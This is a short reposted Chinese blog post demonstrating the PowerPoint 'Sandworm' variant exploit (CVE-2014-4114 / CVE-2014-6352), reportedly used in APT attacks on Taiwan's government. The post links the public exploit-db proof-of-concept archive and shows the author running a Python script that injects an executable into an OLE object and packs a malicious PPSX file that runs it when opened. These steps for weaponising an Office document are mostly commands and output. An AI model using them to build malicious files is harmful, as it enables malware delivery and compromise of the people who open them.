之前看到freebuf上面的一篇文章,被台湾黑客拿去搞APT。期待了好久,终于放出POC了。
Xecure lab在10月17号发现变种的0day漏洞 沙虫(CVE-2014-4114 )已经被用在针对台湾政府以及各单位的APT攻击中,目前主流的杀毒软件还没办法有效地检测。该变种能够直接内嵌恶意软件,并本地触发执行,不需要再从远程共享服务器上下载恶意代码。
http://www.freebuf.com/vuls/48601.html
http://www.exploit-db.com/exploits/35229/
下载 http://www.exploit-db.com/sploits/35216.rar 解压
我在tmp同目录下放入一个exe文件
然后用python脚本生成
E:\tools\tools\35216>E:\tools\tools\35216\CVE-2014-6352.py E:\tools\tools\35216\cmd.exe[+] Injected exe into OLE[+] packing exploit ppsx[+] Done
E:\tools\tools\35216>
生成成功
打开PPSX文件,弹弹弹弹弹!!!
转载于:https://www.cnblogs.com/Le30bjectNs11/p/4096692.html
